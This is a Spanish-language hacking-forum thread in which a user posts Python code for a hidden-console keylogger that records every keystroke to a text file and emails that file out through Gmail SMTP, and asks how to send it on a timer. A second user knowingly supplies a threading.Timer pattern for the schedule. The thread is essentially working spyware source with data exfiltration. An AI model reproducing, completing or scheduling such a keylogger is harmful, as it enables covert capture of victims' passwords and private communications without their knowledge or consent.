elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Duda sobre python y funcion time
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda sobre python y funcion time  (Leído 2,631 veces)
c405

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Duda sobre python y funcion time
« en: 22 Mayo 2017, 00:43 am »

Buenas, por favor de aclararme esta interrogante, tengo una funcion que captura las teclas y las guarda en un txt y otra funcion que me envia ese txt por mail, ahora lo que me gustaria saber es como hacer para que ese txt me sea enviado cada X cantidad de tiempo. Eso deberia implementarlo en la funcion que me envia el mail, pero la verdad que estoy bastante mariado, llevo todo el día enroscado en esto. Si alguien puede echarme un cable se lo agradezco brothers.


En línea

tincopasan


Desconectado Desconectado

Mensajes: 1.286

No es lo mismo conocer el camino que recorrerlo.


Ver Perfil
Re: Duda sobre python y funcion time
« Respuesta #1 en: 22 Mayo 2017, 01:16 am »

hay varias formas de hacerlo, con la biblioteca time o con la de threading. Hay cientos de ejemplos en la red. Podrías poner un código de como lo quieres hacer y ahí ver si hay error o las posibilidades. además no es lo mismo que se repita cada minuto que cada horas o a una hora determinada. En fin hay muchas  variables.


En línea

c405

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Duda sobre python y funcion time
« Respuesta #2 en: 22 Mayo 2017, 01:58 am »

Gracias Bro por responder, mira basicamente esto es lo que he codeado, please misericordia no hace mucho comienzo en programacion.

Código
  1. #Construir Email
  2. import smtplib
  3. from email.mime.multipart import MIMEMultipart
  4. from email.mime.text import MIMEText
  5. #Adjuntar Email
  6. from email.MIMEBase import MIMEBase
  7. from email import encoders
  8.  
  9. import win32api, win32console, win32gui
  10. win=win32console.GetConsoleWindow()
  11. win32gui.ShowWindow(win,0)
  12. import pythoncom, pyHook, sys, logging
  13. import time, datatime
  14.  
  15.  
  16.  
  17. #ARRANCA E-MAIL
  18. addr_to = 'usuario@gmail.com'
  19. addr_from = 'usuario@gmail.com'
  20. smtp_server = smtplib.SMTP('smtp.gmail.com', 587)
  21. smtp_user = 'usuario@gmail.com'
  22. smtp_pass = 'password'
  23. #Se construye el Email
  24. msg = MIMEMultipart()
  25. msg['To'] = addr_to
  26. msg['From'] = addr_from
  27. msg['Subject'] = ':)'
  28. msg.attach(MIMEText('sin titulo', 'plain'))
  29. #Adjunta fichero
  30. fp = open('C:\Users\data.txt', 'rb')
  31. adjunto = MIMEBase('multipart', 'encrypted')
  32. adjunto.set_payload(fp.read())
  33. fp.close()
  34. encoders.encode_base64(adjunto)
  35. adjunto.add_header('Content-Disposition', 'attachment', filename='data.txt')
  36. #Se adjunta al msg/Email
  37. msg.attach(adjunto)
  38. #Iniamos SMTP - loggea - envia - apaga conexion
  39. #server = smtp_server
  40. smtp_server.starttls()
  41. smtp_server.login(smtp_user, smtp_pass)
  42. smtp_server.sendmail(addr_from, addr_to, msg.as_string())
  43. smtp_server.quit()
  44.  
  45.  
  46.  
  47. #Comienza Keylogger
  48. N_archivo = 'C:\Users\data.txt'
  49. def OnKeyboardEvent(event):
  50. logging.basicConfig(filename=N_archivo,
  51.    level=logging.DEBUG,
  52.    format='%(message)s')
  53. logging.log(10,chr(event.Ascii))
  54. return True
  55.  
  56. hm = pyHook.HookManager()
  57. hm.KeyDown = OnKeyboardEvent
  58. hm.HookKeyboard()
  59. pythoncom.pumpMessages()
  60.  
Osea por separado las funciones van bien, el mail me llega con un txt adjunto, por separado el keylogger funciona, claro que visto los codigos de muchos ejemplos que ahi en la red, pero ahora como no entiendo como hacer para que el mail salga cuando ha estado por ejemplo capturando teclas durante una hora, ahora mismo estoy leyendo sobre Thread ( hilos ). pero aun no comprendo del todo el concepto de como aplicarlo.
Devuelta muchas gracias  ya que me estas orientando bastante.

Mil disculpas Engel Lex, no vuelve a suceder!   :rolleyes:

· Los códigos deben ir en etiquetas GeSHi
·No hacer Doble post, usa el botón modificar
>aquí las reglas del foro
-Engel Lex

« Última modificación: 22 Mayo 2017, 03:07 am por c405 » En línea

tincopasan


Desconectado Desconectado

Mensajes: 1.286

No es lo mismo conocer el camino que recorrerlo.


Ver Perfil
Re: Duda sobre python y funcion time
« Respuesta #3 en: 22 Mayo 2017, 03:14 am »

no voy a modificar tu código, te muestro una posibilidad de como hacerlo.
Código
  1. import threading
  2. def Saludar():
  3.    print ("Hola, hay un keylogger")
  4.  
  5. contador= 0
  6. while contador < 5:
  7.    t = threading.Timer(5.0, Saludar)
  8.    t.start()
  9.    t.join()
  10.    contador+=1
  11.  
ahora ves como podés aplicarlo a tu interés.
Saludos.
En línea

c405

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Duda sobre python y funcion time
« Respuesta #4 en: 22 Mayo 2017, 03:31 am »

Gracias, creo comprender la idea.
Saludos.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Resuelto][Duda] Cómo puedo sacar variables de una función? Python « 1 2 »
Scripting
thecloudff7 10 8,595 Último mensaje 28 Julio 2015, 10:33 am
por thecloudff7
Función time()
PHP
dimitrix 2 1,220 Último mensaje 22 Octubre 2015, 01:05 am
por dimitrix
(PYTHON) Duda Basica. Definir funcion
Scripting
BigKaz 2 1,916 Último mensaje 4 Noviembre 2016, 08:00 am
por tincopasan
Duda sobre función
Programación C/C++
fafafa01 1 1,348 Último mensaje 16 Diciembre 2016, 09:27 am
por MAFUS
Duda - Una funcion para limpiar la pantalla en Python
Scripting
n1sen 3 3,061 Último mensaje 1 Agosto 2017, 11:35 am
por <Trocutor>
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines